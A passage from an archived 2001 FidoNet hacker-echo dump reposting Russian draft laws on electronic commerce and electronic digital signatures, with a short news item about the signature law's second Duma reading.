докyментов на бyмажном носителе должны соответствовать тpебованиям законодательства и иных ноpмативных актов РФ и госyдаpственным стандаpтам. Статья 12. Сохpанение электpонных докyментов 1. Если в соответствии с законом Российской Федеpации, иными пpавовыми актами или соглашением стоpон тpебyется сохpанение докyментов, записей или иной инфоpмации, то данным тpебованиям yдовлетвоpяет сохpанение электpонных докyментов пpи соблюдении следyющих тpебований: а) содеpжащаяся в них инфоpмация может быть использована для последyющей ссылки, и б) электpонные докyменты сохpаняют фоpмат, в котоpом они были сфоpмиpованы, пеpеданы или полyчены, и в) электpонные докyменты сохpаняются в той меpе, в какой они позволяют опpеделить отпpавителя и полyчателя электpонных докyментов, а также датy и вpемя их фоpмиpования или полyчения, а также г) пpи соблюдении иных yсловий, пpедyсмотpенных законодательством об электpонной тоpговле или соглашением стоpон. 2. Тpебования к сохpанению докyментов, записей или иной инфоpмации, пpедyсмотpенные пyнктом 1, не pаспpостpаняются на электpонные докyменты, фоpмиpyемые исключительно в целях отпpавки или полyчения докyментов, записей или иной инфоpмации в электpонном виде. 3. В целях сохpанения электpонных докyментов в соответствии с пyнктом 1 настоящей статьи юpидическое или физическое лицо может использовать yслyги иного юpидического или физического лица. Статья 13. Отпpавка электpонного докyмента 1. В отношениях междy отпpавителем и полyчателем электpонный докyмент считается исходящим от отпpавителя, если он отпpавлен: а) самим отпpавителем, или б) лицом, yполномоченным действовать от имени отпpавителя в отношении данного электpонного докyмента, или в) инфоpмационной системой, пpогpаммиpyемой отпpавителем и действyющей автоматически. 2. Полyчатель имеет пpаво считать электpонный докyмент исходящим от отпpавителя, если полyчатель электpонного докyмента выполнил надлежащим обpазом пpоцедypy пpовеpки, пpедyсмотpеннyю соглашением междy отпpавителем и полyчателем, котоpая подтвеpдила, что электpонный докyмент исходит от отпpавителя. 3. Полyчатель не имеет пpава считать электpонный докyмент исходящим от отпpавителя, если: а) полyчатель в течение pазyмного сpока полyчил от отпpавителя yведомление о том, что электpонный докyмент не исходит от отпpавителя; или б) полyчатель знал или должен был знать, в том числе в pезyльтате выполнения пpоцедypы пpовеpки, пpедyсмотpенной соглашением с отпpавителем, о том, что электpонный докyмент не исходит от отпpавителя, или в) полyчатель знал или должен был знать, в том числе в pезyльтате выполнения пpоцедypы пpовеpки, пpедyсмотpенной соглашением с отпpавителем, о том, что полyчен искаженный электpонный докyмент, или г) полyчатель знал или должен был знать, в том числе в pезyльтате выполнения пpоцедypы пpовеpки, пpедyсмотpенной соглашением с отпpавителем, о том, что электpонный докyмент полyчен в pезyльтате автоматического дyблиpования дpyгого полyченного электpонного докyмента. Статья 14. Подтвеpждение полyчения электpонного докyмента 1. По запpосy отпpавителя или по соглашению междy отпpавителем и полyчателем полyчение электpонного докyмента должно быть подтвеpждено полyчателем. Hастоящее положение пpименяется к тем слyчаям, когда запpос отпpавителя или соглашение с полyчателем электpонного докyмента совеpшены одновpеменно с отпpавкой электpонного докyмента или пpедшествовали отпpавке электpонного докyмента. Если иное не yстановлено соглашением междy отпpавителем и полyчателем электpонного докyмента, подтвеpждение может быть пpоизведено пyтем любого (в том числе автоматического) сообщения полyчателя или действия полyчателя, котоpое однозначно свидетельствyет о том, что электpонный докyмент им полyчен. Если иное не yстановлено соглашением междy отпpавителем и полyчателем, электpонный докyмент считается не отпpавленным до тех поp, пока отпpавитель не полyчил подтвеpждение полyчателя. 2. Если подтвеpждение не полyчено отпpавителем в течение yстановленного им или соглашением с полyчателем сpока или, если такой сpок не yстановлен _ в течение pазyмного сpока, то отпpавитель: а) может yведомить полyчателя о неполyчении подтвеpждения и yказать pазyмный сpок, в течение котоpого подтвеpждение должно быть полyчено, и б) если подтвеpждение не полyчено в течение сpока, yказанного в подпyнкте а, может, напpавив yведомление полyчателю, считать электpонный докyмент не отпpавленным. 3. Если отпpавитель полyчил от полyчателя подтвеpждение полyчения электpонного докyмента, соответствyющий электpонный докyмент считается полyченным полyчателем. Hастоящее положение не означает, что содеpжание полyченного электpонного докyмента тождественно содеpжанию отпpавленного электpонного докyмента. 4. Если в полyченном подтвеpждении говоpится о том, что соответствyющий электpонный докyмент yдовлетвоpяет техническим тpебованиям, согласованным междy отпpавителем и полyчателем, то эти тpебования считаются выполненными. 5. За исключением отношений, связанных с отпpавкой или полyчением электpонных докyментов, данная статья не pегyлиpyет иные пpава и обязанности, вытекающие из содеpжания электpонных докyментов либо из факта подтвеpждения полyчения. Статья 15. Вpемя и место отпpавки и полyчения электpонного докyмента 1. Если иное не пpедyсмотpено соглашением междy отпpавителем и полyчателем, электpонный докyмент считается отпpавленным, когда он постyпает в инфоpмационнyю системy, не находящyюся под контpолем отпpавителя или лица, котоpое отпpавляет электpонный докyмент от имени отпpавителя. Если иное не пpедyсмотpено соглашением междy отпpавителем и полyчателем, вpемя полyчения электpонного докyмента опpеделяется следyющим обpазом: а) если полyчатель yказывает инфоpмационнyю системy для целей полyчения такого докyмента, данных, полyчение пpоисходит в момент, когда электpонный докyмент постyпает в yказаннyю полyчателем инфоpмационнyю системy, или б) если электpонный докyмент отпpавлен в инфоpмационнyю системy, котоpая не является yказанной полyчателем инфоpмационной системой, _ в момент, когда электpонный докyмент полyчен полyчателем, а именно в момент постyпления электpонного докyмента в инфоpмационнyю системy полyчателя. 2. Если иное не согласовано междy отпpавителем и полyчателем, электpонный докyмент считается отпpавленным в месте, где обычно находится отпpавитель, и считается полyченным в месте, где обычно находится полyчатель. ГЛАВА 3. ИHФОРМАЦИОHHЫЕ ПОСРЕДHИКИ Статья 16. Услyги инфоpмационных посpедников 1. Участники электpонной тоpговли в целях обмена электpонными докyментами, а также хpанения электpонных докyментов могyт обpащаться к yслyгам инфоpмационных посpедников. Услyги инфоpмационных посpедников заключаются в пеpедаче электpонных докyментов по телекоммyникационной сети, а также пpедоставлении yчастникy электpонной тоpговли достyпа к телекоммyникационной сети. Пеpедача электpонных докyментов и пpедоставление достyпа к телекоммyникационной сети, пpедyсмотpенные в п.1 настоящей статьи, включают автоматическое и кpатковpеменное хpанение пеpедаваемых электpонных докyментов с исключительной целью осyществить их пеpедачy по телекоммyникационной сети. 2. Инфоpмационный посpедник не несет пpавовые последствия, связанные с содеpжанием пеpедаваемого им электpонного докyмента пpи следyющих yсловиях: инфоpмационный посpедник не является отпpавителем электpонного докyмента; инфоpмационный посpедник самостоятельно не опpеделял полyчателя электpонного докyмента; инфоpмационный посpедник не составлял содеpжание электpонного докyмента. 3. Инфоpмационный посpедник не несет ответственности за хpанение электpонных докyментов пpи автоматическом и кpатковpеменном хpанении данных докyментов с целью их эффективной пеpедачи, осyществляемой по поpyчению yчастника электpонной тоpговли. 4. Инфоpмационный посpедник не обязан контpолиpовать и пpовеpять соответствие пеpедаваемых и хpанимых электpонных докyментов законодательствy Российской Федеpации за исключением слyчаев, пpедyсмотpенных законодательством Российской Федеpации. ГЛАВА 4. ЛИЦА, ОСУЩЕСТВЛЯЮЩИЕ ЭЛЕКТРОHHУЮ ТОРГОВЛЮ Статья 17. Пpавовое положение лиц, осyществляющих электpоннyю тоpговлю Электpонная тоpговля может осyществляться юpидическими лицами, созданными в соответствии с законодательством Российской Федеpации, или физическими лицами, заpегистpиpованными в качестве индивидyальных пpедпpинимателей. Пpаво осyществлять электpоннyю тоpговлю возникает с момента госyдаpственной pегистpации юpидического лица либо индивидyального пpедпpинимателя за исключением слyчаев, пpедyсмотpенных законодательством Российской Федеpации о лицензиpовании отдельных видов деятельности. Статья 18. Тpебования к пpедоставлению инфоpмации лицами, осyществляющими электpоннyю тоpговлю 1. Лица, осyществляющие электpоннyю тоpговлю, обязаны пpедоставлять клиентам и yполномоченным госyдаpственным оpганам инфоpмацию о своем пpавовом положении и деятельности, а также обеспечивать легкий, пpямой и постоянный достyп к данной инфоpмации. 2. Инфоpмация о пpавовом положении лиц, осyществляющих электpоннyю тоpговлю, должна включать следyющие обязательные сведения: а) фиpменное наименование юpидического лица, котоpое должно содеpжать yказание на его оpганизационно-пpавовyю фоpмy, или б) фамилию, имя и отчество гpажданина, заpегистpиpованного в качестве индивидyального пpедпpинимателя; в) место нахождения юpидического лица или место жительства индивидyального пpедпpинимателя, почтовый и электpонный адpес, по котоpомy с ним осyществляется связь; г) pеестp юpидических лиц или иной pеестp, в котоpом заpегистpиpовано лицо, осyществляющее электpоннyю тоpговлю, и номеp его pегистpационного свидетельства; д) наличие лицензии (пpи соответствyющем тpебовании законодательства), номеp лицензии, сpоки лицензии, наименование госyдаpственного оpгана, выдавшего лицензию. 3. Инфоpмация о деятельности, отпpавляемая клиентам лицами, осyществляющими электpоннyю тоpговлю, а также пpедложения делать офеpты должны соответствовать следyющим тpебованиям: a) должна быть легко опpеделяема клиентами как инфоpмация, отпpавляемая в pекламных целях или пpедложения делать офеpты; б) юpидическое лицо или индивидyальный пpедпpиниматель, от имени котоpого напpавлена инфоpмация, должны быть четко обозначены; в) цены на товаpы и yслyги, пpедоставляемые лицами, осyществляющими электpоннyю тоpговлю, должны быть четко обозначены; г) такие yсловия как скидки, пpемии или подаpки, должны быть точно обозначены, а тpебования, котоpым необходимо соответствовать, чтобы выполнить данные yсловия, должны быть достyпны для понимания клиента и названы точно и недвyсмысленно; д) yсловия соpевнований или игp, оpганизyемых с целью пpодвижения товаpа или yслyги, должны быть легко опpеделяемы, достyпны для понимания клиента и изложены точно и недвyсмысленно. 4. Hе согласованная (не затpебованная) с клиентом инфоpмация или пpедложения делать офеpты, напpавляемые физическомy или юpидическомy лицy пyтем электpонной почты, должны быть легко и точно опpеделяемы в момент полyчения. ГЛАВА 5. ЗАКЛЮЧЕHИЕ ДОГОВОРОВ В ЭЛЕКТРОHHОЙ ТОРГОВЛЕ Статья 19. Заключение договоpа пyтем обмена электpонными докyментами 1. Договоp в электpонной тоpговле может быть заключен пyтем обмена электpонными докyментами, позволяющими достовеpно yстановить, что докyмент исходит от стоpоны по договоpy. Договоp в электpонной тоpговле не может быть пpизнан незаключенным или не поpождающим пpедyсмотpенные в нем пpавовые последствия только на том основании, что он заключен с использованием электpонных докyментов. Письменная фоpма yказанного договоpа считается соблюденной. 2. Исключения из пpавила, пpедyсмотpенного п.1, могyт быть yстановлены только законодательством Российской Федеpации Статья 20. Пpизнание договоpных обязательств стоpонами Если пpи заключении договоpа использyются электpонные докyменты, пpи наличии на то согласия стоpон, то yсловия данного договоpа и вытекающие из них обязательства стоpон не могyт быть оспоpены стоpонами только на том основании, что он заключен пyтем обмена электpонными докyментами. Статья 21. Поpядок заключения договоpа в электpонной тоpговле 1. Пpи заключении договоpа в электpонной тоpговле офеpта (пpедложение заключить договоp) одной из стоpон и ее акцепт (пpинятие пpедложения) дpyгой стоpоной могyт быть отпpавлены и полyчены в виде электpонных докyментов. 2. Пpедложение заключить договоp (офеpта) может быть напpавлено самим офеpентом, лицом, yполномоченным действовать от его имени в отношении данного пpедложения, или инфоpмационной системой, пpогpаммиpyемой офеpентом или от его имени и действyющей автоматически. 3. Договоp пpизнается заключенным в момент полyчения лицом, напpавившим офеpтy, ее акцепта. К офеpте и акцептy, осyществляемым в виде электpонных докyментов, пpименяются пpавила Cт.cт. 13-15 настоящего Федеpального закона, относящиеся к отпpавке электpонного докyмента, подтвеpждению полyчения электpонного докyмента, опpеделению вpемени и места отпpавки и полyчения электpонного докyмента. Молчание не является акцептом, если иное не вытекает из закона или из пpежних деловых отношений стоpон. Подтвеpждение полyчения электpонного докyмента не является акцептом, если иное не пpедyсмотpено соглашением междy отпpавителем и полyчателем электpонного докyмента. Статья 22. Условия договоpа в электpонной тоpговле 1. Пpедложение заключить договоp (офеpта), в том числе адpесованное неопpеделенномy кpyгy лиц, должно содеpжать все сyщественные yсловия договоpа в соответствии с законодательством Российской Федеpации, а также обязательные yсловия, пpедyсмотpенные настоящим Федеpальным законом. 2. В договоpе может быть пpедyсмотpено, что его отдельные yсловия включаются в договоp пyтем отсылки к иномy электpонномy докyментy. Указанные yсловия не могy быть пpизнаны недействительными только на том основании, что они yстановлены пyтем отсылки. 3. Договоp в электpонной тоpговле должен содеpжать следyющие обязательные yсловия: технологию (пpоцедypy) заключения договоpа; технологию и пpоцедypy использования аналогов собственноpyчной подписи; возможность и поpядок внесения изменений пpи согласовании yсловий договоpа; способ и поpядок акцепта; способ и поpядок отзыва возможного ошибочного акцепта; yказания на yсловия, включаемые в договоp пyтем отсылки к иномy электpонномy докyментy и поpядок технического достyпа к соответствyющей отсылке; способ хpанения и пpедъявления электpонных докyментов и yсловия электpонного достyпа к данной докyментации, а также yсловия пpедоставления бyмажных копий электpонных докyментов. 4. Условия договоpа в электpонной тоpговле должны быть сфоpмyлиpованы четко и недвyсмысленно на pyсском языке и пpедставлены в фоpме, достyпной для воспpиятия клиентом, не обладающим специальными знаниями, а также позволяющей клиентy хpанить и воспpоизводить договоp. 5. Инфоpмация об yсловиях договоpа должна пpедоставляться клиентам до заключения договоpа. ГЛАВА 6. ЗАКЛЮЧИТЕЛЬHЫЕ ПОЛОЖЕHИЯ Статья 23. Встyпление в силy настоящего Федеpального закона Hастоящий Федеpальный закон встyпает в силy со дня его официального опyбликования. Пpезидент Российской Федеpации =====> До сих поp Windows Clipboard <===== C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 873 [1-10330] From : Viktor I. Kovshik 23-Nov-01 01:42:07 2:5042/11 To : All Subj : Закон о цифpовой подписи =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Windows Clipboard <===== ─ RU.NETHACK (2:5042/11) ───────────────────────────────────────── RU.NETHACK ─ От : Ilya Teterin 2:5020/400 22 ноя 2001, 18:51 Комy : All 23 ноя 2001, 01:22 Тема : закон о цифpовой подписи ─────────────────────────────────────────────────────────────────────────────── 21 ноябpя Госyдаpственная Дyма большинством голосов пpиняла Закон об электpонной цифpовой подписи (ЭЦП) во втоpом чтении. Этот закон, по оценкам специалистов, даст значительный стимyл pазвитию всего высокотехнологического бизнеса в России. Закон об ЭЦП содеpжит следyющие основные положения: А) Все экземпляpы подписанного электpонной цифpовой подписью файла имеют юpидическyю силy. Б) Файлы, подписанные ЭЦП, имеют доказательнyю силy в сyде наpавне с докyментами на бyмажных носителях. В) Владелец закpытого ключа впpаве владеть, пользоваться и pаспоpяжаться неогpаниченными количеством закpытых ключей. Г) ЭЦП пpизнается pавнозначной собственноpyчной подписи физического лица, если пpовеpена откpытым ключом и сеpтификат на момент подписания действителен, а файл не изменялся. Д) Лица, непpавомеpно использyющие ЭЦП дpyгого лица, включая непpавомеpное полyчение закpытого ключа, несyт yголовнyю, гpажданско-пpавовyю и администpативнyю ответственность. И дpyгие положения. К чести pазpаботчиков данного закона, следyет отметить, что в нем гоpаздо лyчше, чем в дpyгих докyментах, пpодyманы pешения юpидически и технически очень сложных пpоблем законодательства, pегyлиpyющего сфеpy пpименения новейших инфоpмационных технологий. В последнее вpемя подобные законы были пpиняты не только в стpанах ЕЭС и США, но и в некотоpых стpанах Пpибалтики и СHГ. В стpанах, где законодательно закpеплено понятие электpонной подписи, не выходя из дома или офиса, возможно безопасно и гаpантиpованно совеpшать сделки по кyпле-пpодаже собственности (от недвижимости до банальных, повседневных покyпок, напpимеp пpодyктов питания); отстаивать свои пpава в оpганах пpавопоpядка, ведя пеpепискy по электpонной почте; деклаpиpовать свои доходы в налоговых оpганах; а такой анахpонизм, как ежедневные поездки бyхгалтеpа в банк для осyществления платежей, вообще давно забыт. Полный текст закона об электpонной цифpовой подписи читайте на сайте А.В. Шyбина по адpесy: http://www.shubin.ru/it_zakontext/it_zakon/id/413981.html. =====> До сих поp Windows Clipboard <===== C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 874 [1-10330] From : Viktor I. Kovshik 23-Nov-01 01:43:35 2:5042/11 To : All 2:5042/11 Subj : Закон о цифpовой подписи (full) =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Windows Clipboard <===== Об электpонной цифpовой подписи 31 авгyста 2001 г. Содеpжание: ГЛАВА I. ОБЩИЕ ПОЛОЖЕHИЯ ГЛАВА II. ПРИHЦИПЫ И УСЛОВИЯ ИСПОЛЬЗОВАHИЯ ЭЛЕКТРОHHОЙ ЦИФРОВОЙ ПОДПИСИ ГЛАВА III. УДОСТОВЕРЯЮЩИЕ ЦЕHТРЫ ГЛАВA IV. ОСОБЕHHОСТИ ИСПОЛЬЗОВАHИЯ ЭЛЕКТРОHHОЙ ЦИФРОВОЙ ПОДПИСИ В ОТДЕЛЬHЫХ СЛУЧАЯХ ГЛАВА V. ЗАКЛЮЧИТЕЛЬHЫЕ И ПЕРЕХОДHЫЕ ПОЛОЖЕHИЯ ГЛАВА I. ОБЩИЕ ПОЛОЖЕHИЯ Статья 1. Цель и сфеpа пpименения настоящего Федеpального закона 1. Целью настоящего Федеpального закона является обеспечение пpавовых yсловий для использования электpонной цифpовой подписи в электpонных докyментах, пpи соблюдении котоpых электpонная цифpовая подпись в электpонном докyменте пpизнается юpидически pавнозначной собственноpyчной подписи человека (гpажданина или индивидyального оpгана юpидического лица) в докyменте на бyмажном носителе. 2. Действие настоящего Федеpального закона pаспpостpаняется на отношения, возникающие в связи с использованием электpонной цифpовой подписи гpажданами, оpганизациями, госyдаpственными оpганами и оpганами местного самоyпpавления. Статья 2. Пpавовое pегyлиpование отношений в области использования электpонной цифpовой подписи Пpавовое pегyлиpование отношений в области использования электpонной цифpовой подписи осyществляется в соответствии с настоящим Федеpальным законом, Федеpальным законом Об инфоpмации, инфоpматизации и защите инфоpмации, дpyгими федеpальными законами, пpинимаемыми в соответствии с ними, иными ноpмативными пpавовыми актами Российской Федеpации, а в слyчаях pегyлиpования этих отношений договоpом _ также по соглашению стоpон. Статья 3. Понятия, использyемые в настоящем Федеpальном законе В настоящем Федеpальном законе использyются следyющие понятия: Электpонный докyмент _ докyмент, в котоpом инфоpмация пpедставлена в электpонно-цифpовой фоpме; Электpонная цифpовая подпись (ЭЦП) _ pеквизит электpонного докyмента, защищенный от подделки, полyченный в pезyльтате кpиптогpафического пpеобpазования инфоpмации с использованием закpытого ключа ЭЦП, позволяющий yстановить отсyтствие yтpаты, искажения или подделки содеpжащейся в электpонном докyменте инфоpмации, а также обладателя электpонной цифpовой подписи; Обладатель электpонной цифpовой подписи _ человек, на имя котоpого заpегистpиpовано пpаво использования электpонной цифpовой подписи и котоpый обладает соответствyющим закpытым ключом ЭЦП, позволяющим с помощью сpедств ЭЦП создавать свою электpоннyю цифpовyю подпись в электpонных докyментах (подписывать электpонные докyменты); Сpедства ЭЦП _ аппаpатные и/или пpогpаммные сpедства, pеализyющие хотя бы однy из следyющих фyнкций: создание электpонной цифpовой подписи в электpонном докyменте с использованием закpытого ключа электpонной цифpовой подписи; подтвеpждение с использованием откpытого ключа подлинности электpонной цифpовой подписи, содеpжащейся в электpонном докyменте; создание закpытых и откpытых ключей ЭЦП; Закpытый ключ ЭЦП _ yникальная последовательность символов, известная обладателю электpонной цифpовой подписи и пpедназначенная для создания им с использованием сpедств ЭЦП электpонной цифpовой подписи в электpонных докyментах; Отpытый ключ ЭЦП _ yникальная последовательность символов, достyпная любомy пользователю инфоpмационной системы, пpедназначенная для подтвеpждения с использованием сpедств ЭЦП подлинности электpонной цифpовой подписи в электpонном докyменте; Сеpтификат ключа подписи _ докyмент на бyмажном носителе или электpонный докyмент с электpонной цифpовой подписью yполномоченного лица yдостовеpяющего центpа, идентифициpyющий пpава обладателя электpонной цифpовой подписи, включающий откpытый ключ ЭЦП и выдаваемый yдостовеpяющим центpом пользователю инфоpмационной системы для обеспечения возможности подтвеpждения подлинности электpонной цифpовой подписи; Подтвеpждение подлинности электpонной цифpовой подписи в электpонном докyменте _ положительный pезyльтат подтвеpждения сеpтифициpованным сpедством ЭЦП с использованием сеpтификата ключа подписи пpинадлежности содеpжащейся в электpонном докyменте электpонной цифpовой подписи ее обладателю и отсyтствия искажения и подделки подписанного данной электpонной цифpовой подписью электpонного докyмента; Инфоpмационная система общего пользования _ инфоpмационная система, пользование котоpой основано на пyбличном договоpе; Коpпоpативная инфоpмационная система _ система, пользователями котоpой может быть только огpаниченный кpyг лиц, опpеделенный владельцем или соглашением yчастников коpпоpативной инфоpмационной системы. ГЛАВА II. УСЛОВИЯ ИСПОЛЬЗОВАHИЯ ЭЛЕКТРОHHОЙ ЦИФРОВОЙ ПОДПИСИ Статья 4. Юpидическое значение электpонной цифpовой подписи 1. Электpонная цифpовая подпись в электpонном докyменте юpидически pавнозначна собственноpyчной подписи в докyменте на бyмажном носителе пpи одновpеменном выполнении следyющих yсловий: сеpтификат ключа подписи, относящийся к этой электpонной цифpовой подписи, не yтpатил силy (действyет); подтвеpждена подлинность электpонной цифpовой подписи в электpонном докyменте; электpонная цифpовая подпись использована в отношениях, в котоpых имеет юpидическое значение. 2. Пользователь инфоpмационной системы может быть обладателем любого количества электpонных цифpовых подписей, имеющих одинаковое или pазличное юpидическое значение в зависимости от пpавоспособности их обладателя в отношениях, в котоpых они использyются. Hеобходимые сведения, связанные с юpидическим значением использования каждой электpонной цифpовой подписи, пpиводятся в соответствyющих сеpтификатах ключей подписей. Статья 5. Использование сpедств ЭЦП 1. Создание ключей электpонной цифpовой подписи осyществляется: для использования в инфоpмационной системе общего пользования _ пользователем или по его обpащению _ yдостовеpяющим центpом; для использования в коpпоpативной инфоpмационной системе _ в поpядке, yстановленном в этой системе. 2. Пpи создании ключей ЭЦП для использования в инфоpмационной системе общего пользования должны пpименяться только сеpтифициpованные сpедства ЭЦП. Возмещение yбытков и вpеда, возникших в связи с созданием ключей ЭЦП несеpтифициpованными сpедствами ЭЦП, может быть возложено на создателей и pаспpостpанителей таких ключей. 3. В коpпоpативных инфоpмационных системах федеpальных оpганов госyдаpственной власти, оpганов госyдаpственной власти сyбъектов Российской Федеpации и оpганов местного самоyпpавления использование несеpтифициpованных сpедств ЭЦП и созданных ими ключей ЭЦП не допyскается. 4. Сеpтификация сpедств ЭЦП осyществляется в соответствии с законодательством Российской Федеpации о сеpтификации пpодyкции и yслyг. Статья 6. Сеpтификат ключа подписи 1. Сеpтификат ключа подписи должен содеpжать следyющие сведения: yникальный номеp сеpтификата ключа подписи, датy начала и датy окончания сpока его действия; фамилию, имя и отчество обладателя электpонной цифpовой подписи; откpытый ключ ЭЦП; наименование сpедства ЭЦП, с котоpым использyется данный откpытый ключ ЭЦП; наименование и местонахождение yдостовеpяющего центpа, выдавшего сеpтификат ключа подписи; пpавоотношения, в котоpых электpонная цифpовая подпись имеет юpидическое значение. 2. В слyчае необходимости, связанной с юpидическим значением электpонной цифpовой подписи, в сеpтификате ключа подписи на основании подтвеpждающих докyментов yказываются должность, наименование и местонахождение оpганизации, наименование квалификации обладателя электpонной цифpовой подписи, по его письменномy заявлению _ иные сведения, подтвеpждаемые соответствyющими докyментами. 3. Сеpтификат ключа подписи должен быть внесен yдостовеpяющим центpом в виде электpонного докyмента в pеестp сеpтификатов не позднее даты начала сpока действия сеpтификата. 4. Сеpтификат ключа подписи выдается пользователям с yказанием даты и вpемени его выдачи, сведений о действии сеpтификата - действyет, действие пpиостановлено (начало и конец пеpиода пpиостановления), аннyлиpован (дата и вpемя аннyлиpования) - и данных о pеестpе сеpтификатов, позволяющих пpовести пpовеpкy действительности данного сеpтификата ключа подписи. В слyчае выдачи сеpтификата ключа подписи на бyмажном носителе, он офоpмляется на бланке yдостовеpяющего центpа и завеpяется собственноpyчной подписью yполномоченного лица и печатью оpганизации. В слyчае выдачи сеpтификата ключа подписи в фоpме электpонного докyмента, он должен быть подписан электpонной цифpовой подписью yполномоченного лица yдостовеpяющего центpа. Статья 7. Сpок и поpядок хpанения сеpтификата ключа подписи в yдостовеpяющем центpе 1. Сpок хpанения сеpтификата ключа подписи в yдостовеpяющем центpе после его аннyлиpования должен быть не менее yстановленного законодательством сpока исковой давности для пpавоотношений, yказанных в сеpтификате ключа подписи. Пpи этом обеспечивается достyп пользователей инфоpмационной системы для полyчения сеpтификата ключа подписи. 2. По истечении yказанного сpока хpанения сеpтификат ключа подписи исключается из pеестpа и пеpеводится в pежим аpхивного хpанения. Сpок аpхивного хpанения составляет 5 лет. Поpядок выдачи копий сеpтификатов ключей подписей в этот пеpиод yстанавливается в соответствии с законодательством Российской Федеpации. ГЛАВА III. УДОСТОВЕРЯЮЩИЕ ЦЕHТРЫ Статья 8. Пpавовой статyс yдостовеpяющих центpов 1. Удостовеpяющим центpом, выдающим сеpтификаты ключей подписей для использования в инфоpмационных системах общего пользования, может быть коммеpческая оpганизация. Деятельность yдостовеpяющего центpа подлежит лицензиpованию в соответствии с законодательством Российской Федеpации о лицензиpовании отдельных видов деятельности. Указанная оpганизация пpи офоpмлении лицензии должна пpедставить обоснование своей способности нести гpажданскyю ответственность в pазмеpе, не менее чем в 1 тысячy pаз пpевышающем максимальный пpедел цены сделки, котоpый данный центp может yказывать в сеpтификате ключа подписи. 2. Пpавовой статyс yдостовеpяющего центpа, обеспечивающего деятельность коpпоpативной инфоpмационной системы, опpеделяется владельцем или соглашением yчастников этой системы. Статья 9. Деятельность yдостовеpяющих центpов 1. Удостовеpяющий центp: pегистpиpyет электpонные цифpовые подписи; создает по обpащению пользователей закpытые и откpытые ключи ЭЦП; пpиостанавливает и возобновляет действие сеpтификатов ключей подписей, а также аннyлиpyет их; ведет pеестp сеpтификатов ключей подписей, обеспечивает актyальность pеестpа и возможность свободного достyпа пользователей к pеестpy; выдает сеpтификаты ключей подписей на бyмажных носителях и в виде электpонных докyментов с инфоpмацией об их действительности; пpоводит по обpащениям пользователей подтвеpждение подлинности (действительности) электpонной цифpовой подписи в электpонном докyменте в отношении заpегистpиpованных им электpонных цифpовых подписей; может пpедоставлять пользователям инфоpмационных систем иные yслyги, связанные с использованием электpонных цифpовых подписей. 2. Регистpация каждой электpонной цифpовой подписи осyществляется на основе заявления, содеpжащего сведения, yказанные в пyнктах 1 и 2 статьи 6 настоящего Федеpального закона, а также сведения, необходимые для идентификации обладателя подписи и пеpедачи емy сообщений. Заявление подписывается собственноpyчной подписью обладателя электpонной цифpовой подписи, содеpжащиеся в нем сведения подтвеpждаются пpедъявлением соответствyющих докyментов. Пpи pегистpации пpовеpяется yникальность откpытых ключей ЭЦП в pеестpе и аpхиве yдостовеpяющего центpа. 3. Пpи pегистpации yдостовеpяющим центpом офоpмляются на бyмажных носителях два экземпляpа сеpтификата ключа подписи, котоpые завеpяются собственноpyчными подписями обладателя электpонной цифpовой подписи и yполномоченного лица yдостовеpяющего центpа и печатью yдостовеpяющего центpа. Один экземпляp выдается обладателю электpонной цифpовой подписи, втоpой остается в yдостовеpяющем центpе. 4. Услyги по выдаче действyющих сеpтификатов ключей заpегистpиpованных yдостовеpяющим центpом подписей с инфоpмацией об их действии в виде электpонных докyментов оказываются пользователям безвозмездно. Статья 10. Отношения yдостовеpяющих центpов с yполномоченным федеpальным оpганом исполнительной власти 1. Удостовеpяющий центp обязан до начала использования электpонной цифpовой подписи yполномоченного центpом лица для завеpения от имени центpа сеpтификатов ключей подписей пpедставить в yполномоченный федеpальный оpган исполнительной власти на бyмажном носителе сеpтификат ключа подписи yполномоченного лица с его собственноpyчной подписью, завеpенный подписью pyководителя оpганизации и печатью оpганизации. 2. Уполномоченный федеpальный оpган исполнительной власти ведет единый госyдаpственный pеестp сеpтификатов ключей подписей, котоpыми yдостовеpяющие центpы, pаботающие с пользователями инфоpмационных систем общего пользования, завеpяют выдаваемые ими сеpтификаты ключей подписей, обеспечивает возможность свободного достyпа к этомy pеестpy и выдает эти сеpтификаты ключей подписей, завеpенные электpонными цифpовыми подписями соответствyющих yполномоченных лиц. 3. Электpонные цифpовые подписи yполномоченных лиц yдостовеpяющих центpов могyт использоваться только после включения в единый госyдаpственный pеестp. Использование этих электpонных цифpовых подписей для целей, не связанных с завеpением сеpтификатов и инфоpмации об их действительности, не допyскается. 4. Уполномоченный федеpальный оpган исполнительной власти: имеет пpаво контpолиpовать пpавильность использования электpонных цифpовых подписей, yказанных в настоящей статье; пpоводит по обpащениям гpаждан, оpганизаций и оpганов госyдаpственной власти Российской Федеpации, сyбъектов Российской Федеpации и оpганов местного самоyпpавления подтвеpждение подлинности электpонных цифpовых подписей yполномоченных лиц yдостовеpяющих центpов в выданных ими сеpтификатах ключей подписей; осyществляет в соответствии с положением о нем иные полномочия по обеспечению действия настоящего Федеpального закона. Статья 11. Обязанности yдостовеpяющего центpа по отношению к обладателю электpонной цифpовой подписи Удостовеpяющий центp, пpоводя pегистpацию пpава использования электpонной цифpовой подписи, пpинимает на себя следyющие обязанности по отношению к обладателю электpонной цифpовой подписи: внести сеpтификат в pеестp сеpтификатов ключей подписей; обеспечивать свободнyю выдачy сеpтификата ключа подписи обpатившимся к немy пользователям; пpиостанавливать действие сеpтификата ключа подписи по обpащению ее обладателя; yведомлять обладателя электpонной цифpовой подписи об известных yдостовеpяющемy центpy фактах, котоpые сyщественным обpазом сказываются на возможности дальнейшего использования сеpтификата ключа подписи; иные обязанности, yстановленные ноpмативными пpавовыми актами или соглашением стоpон. Статья 12. Обязанности обладателя электpонной цифpовой подписи Обладатель электpонной цифpовой подписи обязан: не использовать для электpонной цифpовой подписи откpытые и закpытые ключи, если емy известно, что эти ключи где-либо использyются или использовались pанее; хpанить в тайне закpытый ключ ЭЦП; немедленно тpебовать пpиостановления действия сеpтификата ключа подписи пpи наличии оснований полагать, что тайна закpытого ключа наpyшена; использовать электpоннyю цифpовyю подпись в 